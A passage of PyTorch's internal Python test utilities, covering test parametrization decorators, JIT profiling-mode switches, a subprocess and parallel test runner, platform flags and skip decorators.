import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
by the given parametrize_fns. Each given parametrize_fn should each have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consists of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
